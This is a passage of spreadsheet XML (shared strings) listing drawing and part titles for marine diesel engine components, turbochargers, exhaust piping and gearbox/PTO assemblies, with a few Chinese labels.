    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>气缸控制</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>7B4205</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>转速系统</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>7B4220</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MI FOR THRUST BEARING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>2272-0600 - CYLINDER LINE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARR. OF HEATING SHIELD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BEDPLATE COMPLETE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LAMELLA PROFILETYPE:B</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CHAIN SHIELD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INSULATION CLIPS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="18"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>绝缘条</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="18"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">                                               </t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>WELD. NECK FLANGE W. CERT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TEST INFONO</t>
  </si>
  <si>
    <t>SECTIONAL VIEW-K90GF</t>
  </si>
  <si>
    <t>SECTIONAL VIEW-K80GF</t>
  </si>
  <si>
    <t>SECTIONAL VIEW-L55GF</t>
  </si>
  <si>
    <t>SECTIONAL VIEW-K45GF</t>
  </si>
  <si>
    <t>SECTIONAL VIEW-L67GF</t>
  </si>
  <si>
    <t>SECTIONAL VIEW-K84+84VT2</t>
  </si>
  <si>
    <t>LONGITUDINAL SECTION</t>
  </si>
  <si>
    <t>MAIN DIMENSIONS</t>
  </si>
  <si>
    <t>Top Part Number</t>
  </si>
  <si>
    <t>TEST ENGINE CHR.HAVN</t>
  </si>
  <si>
    <t>TEST ENGINE TEGLHOLMEN</t>
  </si>
  <si>
    <t>TEST CENTER TEGLHOLMEN</t>
  </si>
  <si>
    <t>ILLUSTRATIONS - DUAL FUEL</t>
  </si>
  <si>
    <t>CROSS SECTION</t>
  </si>
  <si>
    <t>SERVICE REPORT</t>
  </si>
  <si>
    <t>ULTRASONIC INSPECTION QC</t>
  </si>
  <si>
    <t>DIVISION INTO MAIN SECT.</t>
  </si>
  <si>
    <t>FACE FOR GENERATOR</t>
  </si>
  <si>
    <t>PROXIMETER ELECT-MOUNTING</t>
  </si>
  <si>
    <t>SEALING GASKET-BED./FRAME</t>
  </si>
  <si>
    <t>OUTLET</t>
  </si>
  <si>
    <t>LUBRICATING OIL OUTLET</t>
  </si>
  <si>
    <t>MEASUREMENT TABLE</t>
  </si>
  <si>
    <t>BEARING SHELL-TOOL (DISM.</t>
  </si>
  <si>
    <t>OIL LEVEL IN BEDPLATE</t>
  </si>
  <si>
    <t>FRAMES</t>
  </si>
  <si>
    <t>FRAMES COMPLETE</t>
  </si>
  <si>
    <t>END FRAME AFT COMPLETE</t>
  </si>
  <si>
    <t>STAY BOLT,DEFORMATIONDIAG</t>
  </si>
  <si>
    <t>HYDR.JACK CROSSHEAD GUIDE</t>
  </si>
  <si>
    <t>V-RING ON CAMSHAFT</t>
  </si>
  <si>
    <t>REPAIRS</t>
  </si>
  <si>
    <t>AIR INLET-CYLINDER FRAME</t>
  </si>
  <si>
    <t>COOL.JACK. FINEL GEOMETRY</t>
  </si>
  <si>
    <t>CYL.FRAME FINEL GEOMETRY</t>
  </si>
  <si>
    <t>CYL.LINER FINEL GEOMETRY</t>
  </si>
  <si>
    <t>CYL.LINER WEAR MEASURE.</t>
  </si>
  <si>
    <t>TEMPLATE-CYLINDER LINER</t>
  </si>
  <si>
    <t>INSPECTION REPORT</t>
  </si>
  <si>
    <t>SLEEVE-STARTING VALVE,ASS</t>
  </si>
  <si>
    <t>CYL.COVERS-TEST ENGINE</t>
  </si>
  <si>
    <t>CYL.COVER FINEL GEOMETRY</t>
  </si>
  <si>
    <t>TEMPLATE-CYLINDER COVER</t>
  </si>
  <si>
    <t>WELD.CRANKSH.ULTRAS.EXAM.</t>
  </si>
  <si>
    <t>APPROBATION SKETCH</t>
  </si>
  <si>
    <t>FLANGE CLAMP-OVERVIEW</t>
  </si>
  <si>
    <t>CRANK THROW QC.+PROD.SPEC</t>
  </si>
  <si>
    <t>ENVELOPE</t>
  </si>
  <si>
    <t>MASS DATA MOOVING PARTS</t>
  </si>
  <si>
    <t>OIL INLET AND OUTLET</t>
  </si>
  <si>
    <t>NUT FOR CONN.ROD BOLT</t>
  </si>
  <si>
    <t>LIFTING LEVER</t>
  </si>
  <si>
    <t>LIFT.TOOL FOR CONN. ROD</t>
  </si>
  <si>
    <t>HYDR.JACK CONNECTING ROD</t>
  </si>
  <si>
    <t>SAFETY CLAMP</t>
  </si>
  <si>
    <t>GUIDE-STUFFING BOX</t>
  </si>
  <si>
    <t>HYDRAULIC PULL TOOLS</t>
  </si>
  <si>
    <t>JIGS</t>
  </si>
  <si>
    <t>RAILWAY FOR CROSSHEAD</t>
  </si>
  <si>
    <t>PISTON CROWN BLANK</t>
  </si>
  <si>
    <t>Q.C.SPEC.C8 PISTON RINGS</t>
  </si>
  <si>
    <t>PISTON COMPLETE</t>
  </si>
  <si>
    <t>COOLING INSERT</t>
  </si>
  <si>
    <t>DIM.INSP.PIST.SKIRT U/S50</t>
  </si>
  <si>
    <t>PISTON MOVEMENT</t>
  </si>
  <si>
    <t>PIST.SKIRT QUALITY INSTR.</t>
  </si>
  <si>
    <t>HYDRAULIC TOOLS-PISTON</t>
  </si>
  <si>
    <t>PISTON COOLING OUTLETS</t>
  </si>
  <si>
    <t>Exhaust valve- Housing &amp; Spindle</t>
  </si>
  <si>
    <t>FLAME GUARD</t>
  </si>
  <si>
    <t>SPRING GUIDE-DETAILS</t>
  </si>
  <si>
    <t>ARR.OF SEALING RING</t>
  </si>
  <si>
    <t>EXH.VALVE FINEL GEOMETRY</t>
  </si>
  <si>
    <t>TIGHT.GAUGE-EXH.VALVE NUT</t>
  </si>
  <si>
    <t>DRAWING TOOL</t>
  </si>
  <si>
    <t>KAIS VALVES-TEMPLATES</t>
  </si>
  <si>
    <t>MISCELLANEOUS FUEL VALVE</t>
  </si>
  <si>
    <t>CONTROL</t>
  </si>
  <si>
    <t>ROCKER ARM</t>
  </si>
  <si>
    <t>PUSH ROD</t>
  </si>
  <si>
    <t>SPANNER RACK</t>
  </si>
  <si>
    <t>REP.OF HOUSING F.ROL.GUID</t>
  </si>
  <si>
    <t>ARR.OF FACING AND BEARING</t>
  </si>
  <si>
    <t>SHRINKING-ON TOOLS-ELECT.</t>
  </si>
  <si>
    <t>ENCASED SEALING RING</t>
  </si>
  <si>
    <t>INFORMATION ABOUT V-RINGS</t>
  </si>
  <si>
    <t>GEARBOX, SKETCH</t>
  </si>
  <si>
    <t>REVERSING MECHANISM</t>
  </si>
  <si>
    <t>ARR.GEAR WHEEL DRIVE</t>
  </si>
  <si>
    <t>HYDRAULIC MOTOR</t>
  </si>
  <si>
    <t>START.AIR DISTRIB.DRIVE</t>
  </si>
  <si>
    <t>ALTERATION OF ROLLER LOCK</t>
  </si>
  <si>
    <t>TOOLS FOR MS-103</t>
  </si>
  <si>
    <t>TOOLS-REVERSING MECHANISM</t>
  </si>
  <si>
    <t>BOSSES FOR INSTRUMENTS</t>
  </si>
  <si>
    <t>THERMO FEELER SUPPLEMENT</t>
  </si>
  <si>
    <t>PRESSURE GAUGE H 2 O</t>
  </si>
  <si>
    <t>VIBRALARM, TURBOCHARGER</t>
  </si>
  <si>
    <t>SPRING RETAINER</t>
  </si>
  <si>
    <t>MISCELLANEOUS</t>
  </si>
  <si>
    <t>SIDE PANEL</t>
  </si>
  <si>
    <t>ARR.OF COMPARATOR</t>
  </si>
  <si>
    <t>TEST PANEL</t>
  </si>
  <si>
    <t>FUEL OIL PRE PUMP COMPLETE</t>
  </si>
  <si>
    <t>CONTROL ARRANGEMENT</t>
  </si>
  <si>
    <t>TIME MEASURING-BRAKE CYL.</t>
  </si>
  <si>
    <t>BRACKET WITH GOVERNOR</t>
  </si>
  <si>
    <t>ARR. OF AIR CYLINDER</t>
  </si>
  <si>
    <t>ASSEMBLY POINT</t>
  </si>
  <si>
    <t>ARR.OF AIR POSITIONER</t>
  </si>
  <si>
    <t>STOP PISTON VALVE</t>
  </si>
  <si>
    <t>STARTING AIR SILENCER</t>
  </si>
  <si>
    <t>REPAIR INSTR.STEEL CAST.</t>
  </si>
  <si>
    <t>BRAKE CYLINDER</t>
  </si>
  <si>
    <t>EXHAUST PIPES-TCS</t>
  </si>
  <si>
    <t>EXHAUST PIPE-TCS</t>
  </si>
  <si>
    <t>GALLERY BRACKETS-PTO</t>
  </si>
  <si>
    <t>TORQUE EQUALIZER</t>
  </si>
  <si>
    <t>SPECIFICATIONS-REG.56</t>
  </si>
  <si>
    <t>ALT. OF SCAV.AIR RECEIVER</t>
  </si>
  <si>
    <t>OBSTRUCTION PLATE</t>
  </si>
  <si>
    <t>INLET</t>
  </si>
  <si>
    <t>TRANSITION PIPE</t>
  </si>
  <si>
    <t>INSULATION BUILD-UP</t>
  </si>
  <si>
    <t>ARR.OF EMERGENCY BLOWER</t>
  </si>
  <si>
    <t>EL.PANEL</t>
  </si>
  <si>
    <t>ARR. OF DAMPER</t>
  </si>
  <si>
    <t>ARR. OF SUCTION PIPE</t>
  </si>
  <si>
    <t>INLET BOX</t>
  </si>
  <si>
    <t>COOLER BOX</t>
  </si>
  <si>
    <t>SPECIFICATIONS-REG.57</t>
  </si>
  <si>
    <t>PIPE-EXHAUST VALVE-BOLTED</t>
  </si>
  <si>
    <t>TEMPERATURE MEASUREMENTS</t>
  </si>
  <si>
    <t>BEND-EXHAUST VALVE-BOLTED</t>
  </si>
  <si>
    <t>BEND-EXH.VALVE-CLAMPED</t>
  </si>
  <si>
    <t>BRANCH PIPE-BOLTED</t>
  </si>
  <si>
    <t>INTERMEDIATE PIPE-BOLTED</t>
  </si>
  <si>
    <t>CROSS PIPE-T.C.-BOLTED</t>
  </si>
  <si>
    <t>T-PIPE-UPPER-BOLTED</t>
  </si>
  <si>
    <t>T-PIPE-LOWER-BOLTED</t>
  </si>
  <si>
    <t>T-PIPE-LOWER-CLAMPED</t>
  </si>
  <si>
    <t>BEND-TURBOCHARGER-BOLTED</t>
  </si>
  <si>
    <t>HOLDER FOR GRID-BOLTED</t>
  </si>
  <si>
    <t>ASSEMBLING OF GRATE</t>
  </si>
  <si>
    <t>PARTS LIST-OUTLET PIPE</t>
  </si>
  <si>
    <t>ARR.OF EXHAUST PIPES</t>
  </si>
  <si>
    <t>INSULATION AT GRID</t>
  </si>
  <si>
    <t>INSULATION OF OUTLET PIPE</t>
  </si>
  <si>
    <t>ARR.OF OUTLET PIPES</t>
  </si>
  <si>
    <t>EXHAUST BEND+OUTLET PIPE</t>
  </si>
  <si>
    <t>ARR. OF EXHAUST PIPES</t>
  </si>
  <si>
    <t>SUPPL.FOR EXHAUST PIPE</t>
  </si>
  <si>
    <t>EXHAUST PIPE MANIFOLD</t>
  </si>
  <si>
    <t>EXHAUST OUTLET</t>
  </si>
  <si>
    <t>MOUNTING OF TURBOCHARGER</t>
  </si>
  <si>
    <t>VAR.DETAILS-EXH.RECEIVER</t>
  </si>
  <si>
    <t>LIST OF SILENCERS  L-GFC</t>
  </si>
  <si>
    <t>CLEANING NOZZLE</t>
  </si>
  <si>
    <t>DISMANTLING OF GRATE</t>
  </si>
  <si>
    <t>TORS. VIBRATION DAMPER</t>
  </si>
  <si>
    <t>AIR STARTER MOUNTING</t>
  </si>
  <si>
    <t>FUEL OIL FILTER DUPLEX</t>
  </si>
  <si>
    <t>THRUST HYDR.TOOL</t>
  </si>
  <si>
    <t>HYDRAULIC NUT</t>
  </si>
  <si>
    <t>LUBE OIL FILTER</t>
  </si>
  <si>
    <t>PLATE COOLER LUBE OIL</t>
  </si>
  <si>
    <t>LUB. OIL PUMP COMPLETE</t>
  </si>
  <si>
    <t>MOUNT. OF PRESS. GOVERNOR</t>
  </si>
  <si>
    <t>F.WATER COOL. PUMP COMPL.</t>
  </si>
  <si>
    <t>LIST OF T.C. AND A.C.</t>
  </si>
  <si>
    <t>ARR.OF AIR COOL.-67,80,90</t>
  </si>
  <si>
    <t>GAS INLET-CLAMPED CONN.</t>
  </si>
  <si>
    <t>ARR.LUB.OF CHARGER</t>
  </si>
  <si>
    <t>ARR.OF TURBOCHARGER</t>
  </si>
  <si>
    <t>LOW LOAD VALVE</t>
  </si>
  <si>
    <t>INSTRUCT.CHEM.CLEAN A.C.</t>
  </si>
  <si>
    <t>ARR.OF CLEANING TOOLS</t>
  </si>
  <si>
    <t>ARR.OF CHEMICAL CLEANING</t>
  </si>
  <si>
    <t>ROTOR FOR ROOTS BLOWER</t>
  </si>
  <si>
    <t>SKETCHES</t>
  </si>
  <si>
    <t>GALL.BRACKET-CENTRE</t>
  </si>
  <si>
    <t>GALL.BRACKET-CENTRE-MAN.</t>
  </si>
  <si>
    <t>SUPPORT FOR PLATFORMS</t>
  </si>
  <si>
    <t>SPECIAL PARTS-ARR.ETC.</t>
  </si>
  <si>
    <t>SEATING FOR TURBOCHARGER</t>
  </si>
  <si>
    <t>SEATING-SPECIAL</t>
  </si>
  <si>
    <t>SEATING FOR EXH. RECEIVER</t>
  </si>
  <si>
    <t>SEATING FOR TC/AC</t>
  </si>
  <si>
    <t>ARR.OF COOLER</t>
  </si>
  <si>
    <t>SUPPORT-SPECIAL</t>
  </si>
  <si>
    <t>PLATFORM-UPPER-EXH. SIDE</t>
  </si>
  <si>
    <t>PLATFORM AT SCAV.AIR REC.</t>
  </si>
  <si>
    <t>LADDER AT CHAIN CASING</t>
  </si>
  <si>
    <t>PLATF.ARR.VIEW FROM FORE</t>
  </si>
  <si>
    <t>GALL.BRACK.ARR.EXH.SIDE</t>
  </si>
  <si>
    <t>GALL.BRACK. ARR. FORE END</t>
  </si>
  <si>
    <t>GALLERY ARR-TOP</t>
  </si>
  <si>
    <t>THRUST SHAFT</t>
  </si>
  <si>
    <t>EXTERNAL PIPES LIST</t>
  </si>
  <si>
    <t>SUNDRY PIPES-A OR B SIDE</t>
  </si>
  <si>
    <t>TEE PIECE</t>
  </si>
  <si>
    <t>SKETCHES-COOL.FUEL VALVE</t>
  </si>
  <si>
    <t>FUEL OIL HP PIPE, BEND</t>
  </si>
  <si>
    <t>VARIOUS PIPES-C.GALL.MAN.</t>
  </si>
  <si>
    <t>LUBE OIL OUT.TURBOCHARGER</t>
  </si>
  <si>
    <t>LUB.OIL PIPE-TURBOCHARGER</t>
  </si>
  <si>
    <t>LUB. OIL DISTRIB. PIPE</t>
  </si>
  <si>
    <t>SEALING AIR TC</t>
  </si>
  <si>
    <t>MAIN PIPE-FRESHWATER</t>
  </si>
  <si>
    <t>MAIN PIPE FRESHWATER</t>
  </si>
  <si>
    <t>FRESHWATER PIPE</t>
  </si>
  <si>
    <t>VENT POT</t>
  </si>
  <si>
    <t>DRAIN PIPE-SALT WATER</t>
  </si>
  <si>
    <t>F.W.OUTLET PUMP INLET ENG</t>
  </si>
  <si>
    <t>MISMANUFACTURED TOOLS</t>
  </si>
  <si>
    <t>LIFT.-TOP SECTION FORE</t>
  </si>
  <si>
    <t>LIFT.-TOP SECTION AFT</t>
  </si>
  <si>
    <t>LIFTING OF FRAME FORE</t>
  </si>
  <si>
    <t>LIFTING OF FRAME AFT</t>
  </si>
  <si>
    <t>LIFT.BEDPL.EX.CRKSH.FORE</t>
  </si>
  <si>
    <t>LIFT.BEDPL.EX.CHKSH.AFT.</t>
  </si>
  <si>
    <t>LIFT.-BEDPL.+CRANKSH.FORE</t>
  </si>
  <si>
    <t>LIFT.-BEDPL.+CRANKSH.AFT</t>
  </si>
  <si>
    <t>LIFT.-CRANKSHAFT COMPLETE</t>
  </si>
  <si>
    <t>LIFT.-CRANKSHAFT FORE</t>
  </si>
  <si>
    <t>LIFT.-CRANKSHAFT AFT</t>
  </si>
  <si>
    <t>HYDR. TOOL</t>
  </si>
  <si>
    <t>HAND TOOLS</t>
  </si>
  <si>
    <t>DRAFTS FOR TOOLS, MS 905</t>
  </si>
  <si>
    <t>DRAFTS FOR TOOLS, MS 909</t>
  </si>
  <si>
    <t>TOOLS FOR MS-910</t>
  </si>
  <si>
    <t>DRAFTS FOR TOOLS, MS 914</t>
  </si>
  <si>
    <t>SPEC.TEST PRESSURE PUMP</t>
  </si>
  <si>
    <t>STARTING AIR RECEIVER</t>
  </si>
  <si>
    <t>VIBRATION DEFLECT.CURVES</t>
  </si>
  <si>
    <t>TOP BRACING-POSITIONING</t>
  </si>
  <si>
    <t>HYDRAULIC TOP BRACING</t>
  </si>
  <si>
    <t>VIBRATION COMPENSATOR</t>
  </si>
  <si>
    <t>ROT. COMPENSATOR</t>
  </si>
  <si>
    <t>LIN. COMPENSATOR</t>
  </si>
  <si>
    <t>IN.ENG.</t>
  </si>
  <si>
    <t>RAW MATERIALS WEIGHTS</t>
  </si>
  <si>
    <t>QC FOR CYLLINDER COVER</t>
  </si>
  <si>
    <t>TEST BED</t>
  </si>
  <si>
    <t>TURBOCHARGER COMPLETE</t>
  </si>
  <si>
    <t>PRE-ROTOR-SKETCHES</t>
  </si>
  <si>
    <t>DIFFUSOR VANE-SKETCHES</t>
  </si>
  <si>
    <t>DIFFUSER</t>
  </si>
  <si>
    <t>NOZZLE ASSEMBLY COMPLETE</t>
  </si>
  <si>
    <t>TURBINE INLET</t>
  </si>
  <si>
    <t>COMPRESSOR INLET</t>
  </si>
  <si>
    <t>PERFORMANCE CURVE</t>
  </si>
  <si>
    <t>TURBOCHARGER EFFICIENCY</t>
  </si>
  <si>
    <t>CHARG.AIR COOL. DIMENSION</t>
  </si>
  <si>
    <t>LAY-OUT OF COOLER</t>
  </si>
  <si>
    <t>ASSEMBLY DRAWING LKS</t>
  </si>
  <si>
    <t>AIR COOLER ASSEMBLY</t>
  </si>
  <si>
    <t>COOLER BUILT-IN CLEANING</t>
  </si>
  <si>
    <t>LIFT OF COMPL.ENGINE</t>
  </si>
  <si>
    <t>STARTING AIR DIST.- ARR.</t>
  </si>
  <si>
    <t>MAIN PIPE-CO2 EXTING.</t>
  </si>
  <si>
    <t>PLAC.OF SUPPORT-FRAME BOX</t>
  </si>
  <si>
    <t>PLAC.OF SUPP.ON BEDPLATE</t>
  </si>
  <si>
    <t>LIST OF ORIFICE HOLDERS</t>
  </si>
  <si>
    <t>LIST OF PIPE DIMENSIONS</t>
  </si>
  <si>
    <t>SCREW LENGTHS FOR FLANGES</t>
  </si>
  <si>
    <t>DRILL HOLES F SOCKETS ETC</t>
  </si>
  <si>
    <t>PIPE LENGTHS</t>
  </si>
  <si>
    <t>LIST OF PARTS STD.LIB.</t>
  </si>
  <si>
    <t>MEASURING POINT-STATEMENT</t>
  </si>
  <si>
    <t>Sectional drawing</t>
  </si>
  <si>
    <t>Sectional drawing - PTO</t>
  </si>
  <si>
    <t>Sectional drawing - Front PTO</t>
  </si>
  <si>
    <t>Sectional drawing - Aft end PTO</t>
  </si>
  <si>
    <t>Installation drawing</t>
  </si>
  <si>
    <t>Installation drawing - PTO</t>
  </si>
  <si>
    <t>Installation drawing - Front PTO</t>
  </si>
  <si>
    <t>Install drawing - Aft end PTO</t>
  </si>
  <si>
    <t>Dimension drawing</t>
  </si>
  <si>
    <t>Dimension drawing - PTO</t>
  </si>
  <si>
    <t>Dimension drawing - Front PTO</t>
  </si>
  <si>
    <t>Dimension drawing - Aft end PTO</t>
  </si>
  <si>
    <t>Dimension sketch - Thrust flange</t>
  </si>
  <si>
    <t>Foundation drawing - Epoxy chock</t>
  </si>
  <si>
    <t>Foundation drawing - Steel chock</t>
  </si>
  <si>
    <t>Foundation bolt</t>
  </si>
  <si>
    <t>Foundation adjustment screw</t>
  </si>
  <si>
    <t>Foundation overview - test bench</t>
  </si>
  <si>
    <t>End chock</t>
  </si>
  <si>
    <t>Side chock</t>
  </si>
  <si>
    <t>Plate for chock</t>
  </si>
  <si>
    <t>Support for chock</t>
  </si>
  <si>
    <t>Key for chock</t>
  </si>
  <si>
    <t>Oil diagram - Gear</t>
  </si>
  <si>
    <t>Oil diagram - System</t>
  </si>
  <si>
    <t>Technical data</t>
  </si>
  <si>
    <t>Bolt tightening data</t>
  </si>
  <si>
    <t>Tolerance data</t>
  </si>
  <si>
    <t>Key - keyway connection</t>
  </si>
  <si>
    <t>Pull-up distance for cones</t>
  </si>
  <si>
    <t>Bore out - hub for coupling</t>
  </si>
  <si>
    <t>Bearing placement</t>
  </si>
  <si>
    <t>Painting spec - internal comp</t>
  </si>
  <si>
    <t>Painting spec - external comp</t>
  </si>
  <si>
    <t>Cleaning of pipes</t>
  </si>
  <si>
    <t>Test form - Assembling of gear</t>
  </si>
  <si>
    <t>Test form - Assembling of PTO</t>
  </si>
  <si>
    <t>Test form - Geislinger coupling</t>
  </si>
  <si>
    <t>Testing - Gear with engine</t>
  </si>
  <si>
    <t>Testing - Gear separately</t>
  </si>
  <si>
    <t>Test form - Gear data</t>
  </si>
  <si>
    <t>Signs for gear with PTO</t>
  </si>
  <si>
    <t>Signs for gear without PTO</t>
  </si>
  <si>
    <t>Sign for gear</t>
  </si>
  <si>
    <t>Sign for PTO</t>
  </si>
  <si>
    <t>Arrow - rotation direction</t>
  </si>
  <si>
    <t>Label for position sensor</t>
  </si>
  <si>
    <t>Flexstar section with clutch</t>
  </si>
  <si>
    <t>Flexstar section without clutch</t>
  </si>
  <si>
    <t>Flexstar PTO - Data</t>
  </si>
  <si>
    <t>Flexstar - Additional machining</t>
  </si>
  <si>
    <t>Testskema - Flexstar - Mounting</t>
  </si>
  <si>
    <t>Sign for Flexstar</t>
  </si>
  <si>
    <t>Gearbox bore out complete</t>
  </si>
  <si>
    <t>Gearbox bore out</t>
  </si>
  <si>
    <t>Gearbox lower part</t>
  </si>
  <si>
    <t>Gearbox lower part casted</t>
  </si>
  <si>
    <t>Gearbox intermediate part</t>
  </si>
  <si>
    <t>Gearbox intermediate part casted</t>
  </si>
  <si>
    <t>Gearbox upper part</t>
  </si>
  <si>
    <t>Gearbox upper part casted</t>
  </si>
  <si>
    <t>Gearbox top part</t>
  </si>
  <si>
    <t>Gearbox top part casted</t>
  </si>
  <si>
    <t>Gearbox cap</t>
  </si>
  <si>
    <t>Gearbox cap casted</t>
  </si>
  <si>
    <t>Thrust bearing housing complete</t>
  </si>
  <si>
    <t>Thrust bearing housing lowerpart</t>
  </si>
  <si>
    <t>Thrust bearing housing low cast</t>
  </si>
  <si>
    <t>Thrust bearing housing upperpart</t>
  </si>
  <si>
    <t>Thrust bearing hous upper casted</t>
  </si>
  <si>
    <t>Thrust bearing cover complete</t>
  </si>
  <si>
    <t>Thrust bearing cover low casted</t>
  </si>
  <si>
    <t>Thrust bearing cover top casted</t>
  </si>
  <si>
    <t>Sealing housing complete</t>
  </si>
  <si>
    <t>Sealing housing lower part</t>
  </si>
  <si>
    <t>Sealing housing lower casted</t>
  </si>
  <si>
    <t>Sealing housing upper part</t>
  </si>
  <si>
    <t>Sealing housing upper part cast</t>
  </si>
  <si>
    <t>Bearing support - Fore</t>
  </si>
  <si>
    <t>Bearing support - Aft</t>
  </si>
  <si>
    <t>Bearing support</t>
  </si>
  <si>
    <t>Bearing support casted</t>
  </si>
  <si>
    <t>Bearing cap - Fore</t>
  </si>
  <si>
    <t>Bearing cap - Aft</t>
  </si>
  <si>
    <t>Bearing cap casted</t>
  </si>
  <si>
    <t>Bearings in Gear</t>
  </si>
  <si>
    <t>Thrust bearing</t>
  </si>
  <si>
    <t>Thrust pad</t>
  </si>
  <si>
    <t>Supporting ring for thrust pad</t>
  </si>
  <si>
    <t>Supporting plate for thrust pad</t>
  </si>
  <si>
    <t>Thrust washer</t>
  </si>
  <si>
    <t>Locking ring for thrust washer</t>
  </si>
  <si>
    <t>Journal bearing</t>
  </si>
  <si>
    <t>Guide bearing</t>
  </si>
  <si>
    <t>Locking washer for bearing</t>
  </si>
  <si>
    <t>Covers on gear</t>
  </si>
  <si>
    <t>Cover on front end</t>
  </si>
  <si>
    <t>End cover on front end</t>
  </si>
  <si>
    <t>Service cover on front end</t>
  </si>
  <si>
    <t>Cover for position sensor</t>
  </si>
  <si>
    <t>Cover on front end - PTO</t>
  </si>
  <si>
    <t>Cover on aft end</t>
  </si>
  <si>
    <t>End cover on aft end</t>
  </si>
  <si>
    <t>Cover for sealing housing</t>
  </si>
  <si>
    <t>Cover on aft end - PTO</t>
  </si>
  <si>
    <t>Side cover</t>
  </si>
  <si>
    <t>Side cover - Fore</t>
  </si>
  <si>
    <t>Side cover - Aft</t>
  </si>
  <si>
    <t>Side cover with pipe</t>
  </si>
  <si>
    <t>Side cover - PTO</t>
  </si>
  <si>
    <t>Side cover - PTO casted</t>
  </si>
  <si>
    <t>Top cover</t>
  </si>
  <si>
    <t>Cover on top - PTO</t>
  </si>
  <si>
    <t>Cover</t>
  </si>
  <si>
    <t>Blind cover</t>
  </si>
  <si>
    <t>Protection cover</t>
  </si>
  <si>
    <t>Throw off ring cover input shaft</t>
  </si>
  <si>
    <t>Throw off ring cover PTO</t>
  </si>
  <si>
    <t>Cover premachined</t>
  </si>
  <si>
    <t>Cover casted</t>
  </si>
  <si>
    <t>Gasket for cover</t>
  </si>
  <si>
    <t>Oil pump housing mounted</t>
  </si>
  <si>
    <t>Oil pump housing complete</t>
  </si>
  <si>
    <t>Oil pump housing</t>
  </si>
  <si>
    <t>Oil pump housing upper part</t>
  </si>
  <si>
    <t>Oil pump housing lower part</t>
  </si>
  <si>
    <t>Oil pump housing aft part</t>
  </si>
  <si>
    <t>PTO housing mounted</t>
  </si>
  <si>
    <t>PTO housing complete</t>
  </si>
  <si>
    <t>PTO housing</t>
  </si>
  <si>
    <t>PTO housing upper part</t>
  </si>
  <si>
    <t>PTO housing intermediate part</t>
  </si>
  <si>
    <t>PTO housing lower part</t>
  </si>
  <si>
    <t>PTO Bearing covers - Fore</t>
  </si>
  <si>
    <t>PTO Bearing covers - Aft</t>
  </si>
  <si>
    <t>Input shaft complete</t>
  </si>
  <si>
    <t>Input shaft</t>
  </si>
  <si>
    <t>Input shaft premachined</t>
  </si>
  <si>
    <t>Clutch shaft</t>
  </si>
  <si>
    <t>Clutch shaft premachined</t>
  </si>
  <si>
    <t>Output shaft complete</t>
  </si>
  <si>
    <t>Thrust shaft complete</t>
  </si>
  <si>
    <t>Thrust shaft</t>
  </si>
  <si>
    <t>Thrust shaft premachined</t>
  </si>
  <si>
    <t>Supporting shaft complete</t>
  </si>
  <si>
    <t>Supporting shaft</t>
  </si>
  <si>
    <t>Supporting shaft premachined</t>
  </si>
  <si>
    <t>PTO shaft complete - master</t>
  </si>
  <si>
    <t>PTO shaft complete</t>
  </si>
  <si>
    <t>PTO shaft with pinion - master</t>
  </si>
  <si>
    <t>PTO shaft with pinion</t>
  </si>
  <si>
    <t>PTO shaft - master</t>
  </si>
  <si>
    <t>PTO shaft</t>
  </si>
  <si>
    <t>PTO shaft premachined</t>
  </si>
  <si>
    <t>Intermediate shaft complete</t>
  </si>
  <si>
    <t>Intermediate shaft</t>
  </si>
  <si>
    <t>Intermediate shaft premachined</t>
  </si>
  <si>
    <t>Hub for input shaft</t>
  </si>
  <si>
    <t>Hub for input shaft premach.</t>
  </si>
  <si>
    <t>Hub for PTO</t>
  </si>
  <si>
    <t>Hub for PTO premachined</t>
  </si>
  <si>
    <t>Pinion</t>
  </si>
  <si>
    <t>Gear wheel</t>
  </si>
  <si>
    <t>Oil guard mounted</t>
  </si>
  <si>
    <t>Oil guard complete</t>
  </si>
  <si>
    <t>Plate for oil guard</t>
  </si>
  <si>
    <t>Pinion for PTO</t>
  </si>
  <si>
    <t>Pinion for front PTO</t>
  </si>
  <si>
    <t>Pinion for centre PTO</t>
  </si>
  <si>
    <t>Pinion for offset PTO</t>
  </si>
  <si>
    <t>Gear wheel for PTO</t>
  </si>
  <si>
    <t>Gear wheel for centre PTO</t>
  </si>
  <si>
    <t>Gear wheel for offset PTO</t>
  </si>
  <si>
    <t>Pinion for pump</t>
  </si>
  <si>
    <t>Gear wheel for pump drive</t>
  </si>
  <si>
    <t>Spline - internal toothing</t>
  </si>
  <si>
    <t>Spline - external toothing</t>
  </si>
  <si>
    <t>Tooth data - pinion / gear wheel</t>
  </si>
  <si>
    <t>Tooth data - PTO</t>
  </si>
  <si>
    <t>Tooth data - Pump</t>
  </si>
  <si>
    <t>Clutch hub</t>
  </si>
  <si>
    <t>Conical sleeve for clutch hub</t>
  </si>
  <si>
    <t>Clutch shell</t>
  </si>
  <si>
    <t>Clutch piston</t>
  </si>
  <si>
    <t>Clutch cylinder</t>
  </si>
  <si>
    <t>Clutch cylinder premachined</t>
  </si>
  <si>
    <t>Declutching ring</t>
  </si>
  <si>
    <t>Declutching ring premachined</t>
  </si>
  <si>
    <t>Clutch disc</t>
  </si>
  <si>
    <t>Clutch disc premachined</t>
  </si>
  <si>
    <t>Stop ring for clutch</t>
  </si>
  <si>
    <t>Locking plate for clutch</t>
  </si>
  <si>
    <t>Guide pin for clutch piston</t>
  </si>
